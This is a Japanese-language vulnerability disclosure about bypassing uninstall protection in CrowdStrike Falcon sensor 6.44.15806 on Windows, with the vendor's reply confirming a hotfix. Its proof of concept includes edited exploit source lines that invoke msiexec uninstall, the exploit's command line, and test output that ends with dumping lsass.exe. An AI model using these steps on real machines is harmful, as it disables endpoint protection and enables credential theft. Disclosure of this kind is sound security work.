
CrowdStrike Falcon は、クラウドベースのエンドポイント検出・対応(EDR)およびアンチウイルス(AV)ソリューションです。各エンドデバイスにはカーネルレベルの管理センサーが展開され、クラウドベースの機能を利用します。センサーはアンインストール保護付きで構成できます。これにより、ワンタイムで生成されたトークンなしではエンドデバイスから CrowdStrike Falcon センサーをアンインストールできないようになっています。
この脆弱性を悪用すると、管理者権限を持つ攻撃者が Windows エンドデバイス上のトークンチェックをバイパスし、適切な認証なしにセンサーをデバイスからアンインストールできるようになり、結果としてデバイスの EDR および AV 保護を無効化できます。
影響を受けるセンサーバージョン: 6.44.15806
CrowdStrike サポートチームからの受領確認メールの抜粋
...
As the referenced CVE was not released in coordination with CrowdStrike, it may be missing some details, however our customers
have been kept up to date on our remediation efforts and the affected sensor versions, including a release of the hotfix for v6.44.15806.
Please see the relevant tech alerts explaining the nature of this issue and the fix releases at
https://supportportal.crowdstrike.com/s/article/Tech-Alert-Uninstall-Protection-Bug-in-Falcon-Sensor-for-Windows
Therefore, I believe you can go ahead and publish the CVE adding the impacted Sensor versions
we were able to test and confirm they are affected.
...
メールに記載されているとおり、CrowdStrike はすでに影響を受けるバージョンにパッチを適用済みです。
# edit #1
Line 111: std::string cmd = "cmd /c start msiexec /x " + guid;
# edit #2
Line 67: if (g_msiexec_instance_count == 3 || g_msiexec_instance_count == 5) {
.\Falcon-6.44.15806-uninstall.exe "C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.44.15806\CsAgent.msi"
テストマシン名: MOANA
ポリシー: EXTRA AGGRESSIVE(すべてのオプション有効)

アンインストール中...

アンインストール完了(CrowdStrike ディレクトリ内にファイルはもうありません)- デーモンがメモリ上でまだアクティブかつ実行中の場合は再起動が必要です(検出が生成されます)

Moana の結果はクラウド経由では到達不能

lsass.exe のダンプ

Fortunato [fox] Lodari, Raffaele Nacca, Walter Oberacher, Davide Bianchin, Luca Bernardi @ Deda Cloud Cybersecurity Team